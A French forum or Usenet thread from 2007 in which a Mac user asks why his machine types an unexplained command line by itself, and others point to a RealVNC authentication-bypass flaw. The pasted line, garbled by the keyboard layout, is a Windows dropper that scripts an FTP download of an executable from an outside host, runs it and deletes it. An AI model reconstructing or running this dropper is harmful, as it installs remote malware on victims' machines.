Un Virus ?

92 réponses
RiGuad
Je m'en remet aux avis autorisés n'y comprenant plus rien a une
situation que je vis depuis 2 semaines :

Dans n'importe quelle situation, a n'importe quel moment , y compris
quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
"écrit " tout seul les "choses" suivantes :

(syste,root(`syste,ӎ`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit

Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
debrancher de son port usb, et de le rebrancher.
Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
"prend la main" sur tout ce que je peux faire , y compris debrancher le
clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
ci dessus indiquée.

Un reboot ne change rien, ni reparation des autorisation, ni extinction
redémarrage.

Le plus insupportable est lorsque l'on tchatte avec un ami, ou cette
ligne incontrolable se tape toute seule , et ... se termine par un
Return ! L'ami recoie ca en plleine figure, et je dois debrancher
rebrancher mon clavier pour m'excuser.

Qu faire pour arreter ceci ? je ne vais quand meme pas reinstaller mon
Tiger ! ?

Merci a tous.

2 réponses

Nina Popravka
On Thu, 08 Mar 2007 21:44:14 +0100, Olivier Croquette
wrote:

Vous n'aviez pas démarré un dialogue direct (DCC) avec lui par hasard?
http://en.wikipedia.org/wiki/Direct_Client-to-Client

C'est beaucoup plus simple que ça. C'est l'exploitation de cette
faille :
<http://www.hsc.fr/ressources/breves/realvnc41_bypass.html.fr>
(en dehors du fait que le gars avait pas de pass...)

Je dois avouer que VNC ne m'a jamais inspiré aucune confiance, et si y
a bien un truc que je fais voyager par ssh, c'est lui :-(
--
Nina

Olivier Croquette
Nina Popravka wrote, On 08.03.2007 22:33 Uhr:

Vous n'aviez pas démarré un dialogue direct (DCC) avec lui par hasard?
http://en.wikipedia.org/wiki/Direct_Client-to-Client

C'est beaucoup plus simple que ça. C'est l'exploitation de cette
faille :
<http://www.hsc.fr/ressources/breves/realvnc41_bypass.html.fr>

Je ne vois pas bien le rapport avec VNC...

Je répondais à l'interrogation face à un type sur IRC qui arrivait à
récupérer l'adresse IP de ses interlocuteurs alors que le serveur la
cache (apparemment).